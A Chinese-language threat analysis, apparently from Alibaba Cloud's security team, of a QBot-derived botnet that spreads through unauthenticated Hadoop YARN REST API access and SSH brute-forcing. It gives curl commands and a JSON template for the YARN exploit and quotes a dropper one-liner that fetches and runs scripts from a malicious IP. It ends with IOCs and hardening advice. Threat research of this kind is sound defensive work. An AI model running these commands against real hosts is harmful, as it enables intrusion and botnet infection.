商城微网站开发微网站,wordpress 换域名 403,网站备案 办公室电话,十大免费cms建站系统介绍互联网给人带来便捷的同时#xff0c;其公开大量的资源也同样给恶意利用者带了便捷#xff0c;越来越多公开的恶意程序源码降低了对外攻击、入侵的难度#xff0c;使得安全问题愈加严重。 阿里云安全团队从今年5月份监测到一BOT家族#xff0c;其样本改写自互联网公开渠道…互联网给人带来便捷的同时其公开大量的资源也同样给恶意利用者带了便捷越来越多公开的恶意程序源码降低了对外攻击、入侵的难度使得安全问题愈加严重。 阿里云安全团队从今年5月份监测到一BOT家族其样本改写自互联网公开渠道源码在互联网上广泛传播造成了极大的危害云安全团队对该类样本做了分析、聚类、溯源在此我们将该类样本命名为QBotVariant。 QBotVariant具有DDoS攻击、后门、下载器、暴力破解等功能一旦被入侵便变成肉鸡其主要传播方式通过Hadoop Yarn资源管理系统REST API未授权访问漏洞和基于弱口令的暴力破解。类似Mirai该BOT家族针对多个版本的操作系统不仅服务器受到危害如CCTV监控、家庭路由等IOT设备更容易被攻击、入侵。Radware公司Pascal Geenens在最新的博客《New DemonBot Discovered》中提及到该类样本但是他发现的IP、样本等信息只是该类家族的其中一个样本而我们从监测到30多个下载服务器可以看出QBotVariant多变的IP和二进制样本变种使其难以发现和跟踪。 在云平台上我们监测到的QBotVariant活跃度如下峰值的时候可以达到上千个活跃度一直未减。 以下我们将从传播方式、脚本分析、样本分析、溯源等多个角度对QBotVariant进行详细的分析。 入侵、传播方式 QBotVariant家族传播的方式有两种一是利用Hadoop Yarn资源管理系统REST API未授权访问漏洞进行入侵二是通过硬编码的弱密码进行SSH暴力破解。 Hadoop是一款由Apache基金会推出的分布式系统框架它通过著名的MapReduce算法进行分布式处理Yarn是Hadoop集群的资源管理系统。Hadoop Yarn资源管理系统配置不当导致可以未经授权进行访问从而被攻击者恶意利用。攻击者无需认证即可通过REST API部署任务来执行任意代码最终完全控制服务器。 其问题来源于对外开启了以下作用的端口 yarn.resourcemanager.webapp.address默认端口8088 yarn.resourcemanager.webapp.https.address默认端口8090 通过对新申请application如下指令 curl -v -X POST http://ip:port/ws/v1/cluster/apps/new-application 再执行如下指令即可完成入侵 curl -s -i -X POST -H Accept:application/json -H Content-Type:application/jsonhttp://ip:port/ws/v1/cluster/apps -data-binary example.json 其example.json文件如下 {am-container-spec:{commands:{command:执行的命令书写在这里}},application-id:application_xxxx_xxxxx,application-name:test,application-type:YARN} 脚本分析 我们通过溯源找到了QBotVariant比较原始版本的脚本在原始版本的脚本中支持wget、tftp、ftpget等脚本的执行从远程下载服务器下载脚本并执行 bash -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://185.244.25.153/bins.sh; chmod 777 bins.sh; sh bins.sh;tftp 185.244.25.153 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;tftp -r tftp2.sh -g 185.244.25.153; chmod 777 tftp2.sh; sh tftp2.sh;ftpget -v -u anonymous -p anonymous -P 21 185.244.25.153 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh 以下是阿里云安全截获的一个经过改写的下载脚本从脚本可以看出作者为了能够很好的对IOT设备支持一方面编译了不同版本的程序通过ntpd、sshd、openssh等进行伪装另一方面每个命令行都加入了对busybox的支持这些使得该类脚本很好的支持了IOT设备为QBotVaraint的传播提供了更加便捷的途径。 在阿里云捕获的源码中有用于编译多个版本的脚本 QBotVariant支持版本类型及其对应二进制名称: 支持版本类型 对应二进制名称 支持版本类型 对应二进制名称 mips ntpd i586 ftp mipsel sshd m68k pftp sh4 openssh sparc sh x86_64 bash armv4l   armv6l tftp armv5l apache2 i686 wget powerpc-440fp telnetd powerpc cron    样本分析 阿里云截获的多批次样本都比较相似都改编于QBot。某些作者为了精简样本或者进行杀软对抗可能将某些功能进行裁剪我们随机对比两个捕获的样本如图右边的样本对getRandomPublicIP函数进行了裁剪该样本只实现了QBot的少许功能其文件更小、功能更加单一。 而绝大部分样本都实现了基本功能其传播性、危害性等性质并未改变部分函数如图所示 指令分析 我们对远控指令进行了分析其功能如下图所示 值得注意是StartTheLelz函数该函数主要用于对随机生成的IP地址进行爆破如图通过getRandomPublicIP函数得到随机的IP将硬编码的用户名和密码存储在结构体中然后进行连接其最大爆破次数通过max变量进行控制max和文件描述表的项数有关但最大不超过4096。 通过数据区可以看见作者集成了几种常见的用户名和密码用于爆破 如果最终爆破成功则会在被爆破的主机中执行如下脚本从而感染主机再继续向外传播 除了集成常见的对外DDoS攻击方法QBotVariant还可以进行对外发送垃圾数据通过sendJUNK或sendUDP即可完成该动作如图用于生成随机字符串的makeRandomStr函数通过发送大量垃圾包同样可以造成网络带宽阻塞。 而QBotVariant为了最大化入侵价值同样提供了远程shell命令执行功能其命令以SH开头通过fdgets、sockprintf将命令执行后的结果返回到远控端实现如下 样本溯源/同源性分析 我们在对样本分析的过程中发现一个有趣的现象样本为了逃避检测有多种不同的指令我们选取了几种QBotVariant的上线方式。 第一种信息较简单返回大小端、CPU架构、主机用途等信息。 第二种信息比较全面带有操作系统、CPU架构、主机用途、端口、主机IP等信息。 第三种信息最为简单只返回架构信息。 第四种返回大小端、架构信息。 第五种信息比较全面架构信息、大小端、主机IP、主机用途等信息。 第六种返回主机IP、类型、版本信息等。 第七种返回架构、主机IP等信息。 我们在对样本进行溯源发现在pastebin上存在大量该类样本的源码、二进制文件等其存在时间都在数月之久作者目录下还包括其他类型IOT蠕虫同时发现多个作者进行了QBot的改写如图是其中一位作者的pastebin和github QBot在国内似乎大家认知不多但是由于源码简单、客户端小、支持多种架构从09年活跃至今一直未间断过常被应用于远控、DDoS等客户端在其截获的IP中绝大部分位于北美和欧洲各地但是云平台检测到来自国内IP的攻击源国内安全人员应该引起重视。 安全加固 ●  云防火墙 开启云防火墙IPS拦截模式和虚拟补丁功能云防火墙已经支持对该类漏洞的防御和防止暴力破解功能用户即使不及时修复也依然能够进行防御拦截。 ●  网络访问控制使用ECS/VPC安全组对受影响服务端口访问源IP进行控制如果本身Hadoop环境仅对内网提供服务请不要将Hadoop服务端口发布到互联网。 ●  更新升级 若使用自建的Hadoop根据实际情况及时更新补丁Hadoop在2.X以上版本提供了安全认证功能加入了Kerberos认证机制建议启用Kerberos认证功能或者您可以选择使用云上的MaxCompute(8年以上零安全漏洞)或云上的E-MAPREDUCE服务。 安全建议 ●  云防火墙产品已支持防御针对此漏洞的攻击建议用户可以购买云防火墙开启检测。 ●  通过安全管家服务在阿里云安全专家的指导下进行安全加固及优化工作避免系统受到漏洞影响。 总结 QBotVariant通过Hadoop Yarn资源管理系统REST API未授权访问漏洞、弱密码口令爆破等方式进行入侵一旦感染此类蠕虫不仅会占用主机计算资源消耗带宽流量成为攻击其他主机的肉鸡还可能造成数据泄露数据丢失等后果。 阿里云安全提醒广大互联网用户注意第三方应用的配置防止出现此类未授权漏洞同时加强用户名和密码的安全意识切实保护自身资产安全。 IOC 部分MD5-文件名 文件名 MD5 185.244.25.153   YSDKOP.arm4 cc9de0d789efc8636946b4b41f374dfc YSDKOP.arm5 ac94604edfe7730ccf70d5cd75610d01 YSDKOP.arm6 dcb51c5abd234a41ee0439183f53fd2d YSDKOP.arm7 2416380b2fe0c693fd7c26a91b4cb8ee YSDKOP.i586 2f029723c778f15e8e825976c66e45cd YSDKOP.i686 49ec48d3afdddb098fa2c857fc63c848 YSDKOP.m68k 7efef839902ca20431d58685d9075710 YSDKOP.mips eab0810535b45fa1bf0f6243dafb0373 YSDKOP.mpsl a2c4e09821be6a4594e88376b9c30b5d YSDKOP.ppc 1fc61114722f301065cd9673025ce5e0 YSDKOP.sh4 38abc827e67ff53d0814979b435e2c40 YSDKOP.sparc 20a38aeeffba9f0f1635c7b4b78f3727 YSDKOP.x86 8fd97d622e69b69a3331ee5ed08e71b2 188.166.125.19    7e9c49b9e743bcf7b382fa000c27b49d apache2 64394fb25494b0cadf6062a0516f7c1a bash 75e7ce8c110bb132d3897b293d42116a cron e8dfae1fe29183548503dc0270878e52 ftp 0e765d00f0ee174e79c81c9db812e3a2 ntpd 2cb932dcb5db84dafa8cdc6b4afa52d0 openssh 606a3169f099b0f2423c63b4ed3f9414 pftp 6666ef216ce7434927338137760f4ab0 sh cc2e82ffbc6d5053efade4849c13099f sshd 00b0a6516986aca277d0148c7ddf38c4 tftp 38b075ee960d08e96b2e77205ec017de wget 58c5e1bc66ac6b364639bce4b3f76c58 部分IP 178.128.194.222 178.128.7.76 103.214.111.122 130.185.250.199 194.182.80.200 138.197.74.100 198.199.84.119 104.248.165.108 178.128.46.254 159.65.227.17 206.189.196.216 80.211.109.66 194.48.152.114 159.89.114.171 178.128.43.104 185.244.25.153 209.97.159.10 46.36.37.121 46.29.164.242 46.17.47.250 158.69.60.239 195.181.223.138 80.211.39.186 188.166.125.19 104.248.112.122 212.237.26.71 178.128.239.252 104.248.212.127 104.248.63.168   部分URL及出现时间 URL 时间 http://138.197.74.100/bins.sh 20180904 http://80.211.39.186/bins.sh 20180904 http://178.128.239.252/bins.sh 20180908 http://158.69.60.239/bins/boti586final 20180908 http://158.69.60.239/bins/botx86_64final 20180908 http://158.69.60.239/bins/boti686final 20180908 http://158.69.60.239/bins.sh 20180908 http://178.128.239.252/bins.sh 20180909 http://130.185.250.199/bins.sh 20180909 http://46.17.47.250/xm2bash 20180913 http://104.248.112.122/Kuso69/Akiru.x86 20180918 http://194.182.80.200/bins.sh 20180919 http://104.248.112.122/Kuso69/Akiru.x86 20180919 http://209.97.159.10/bins.sh 20181003 http://46.17.47.250/xm2wget 20181005 http://185.244.25.153/bins.sh 20181009 http://159.65.227.17/bins.sh 20181009 http://178.128.7.76/bins.sh 20181010 http://185.244.25.153/bins.sh 20181010 http://104.248.212.127/bins.sh 20181010 http://159.65.227.17/bins.sh 20181010 http://206.189.196.216/bins.sh 20181010 http://188.166.125.19/bins.sh 20181010 http://188.166.125.19/bins.sh 20181011 http://185.244.25.153/bins.sh 20181011 http://178.128.7.76/bins.sh 20181011 http://104.248.212.127/bins.sh 20181011 http://80.211.109.66/bins.sh 20181012 http://185.244.25.153/bins.sh 20181012 http://195.181.223.138/bins.sh 20181012 http://159.89.114.171/bins.sh 20181012 http://178.128.7.76/bins.sh 20181012 http://104.248.212.127/bins.sh 20181012 http://185.244.25.153/bins.sh 20181015 http://104.248.165.108/bins.sh 20181018 http://198.199.84.119/bins.sh 20181018 http://103.214.111.122/bins.sh 20181019 http://178.128.46.254/bins.sh 20181019 http://178.128.43.104/bins.sh 20181019 http://104.248.63.168/vvglma 20181021 http://178.128.194.222/bins.sh 20181026 http://178.128.194.222/bins.sh 20181027 http://178.128.194.222/bins.sh 20181028 http://46.29.164.242/bins.sh 20181031 http://194.48.152.114/bins.sh 20181101 http://46.36.37.121/weed.sh 20181103 原文链接 本文为云栖社区原创内容未经允许不得转载。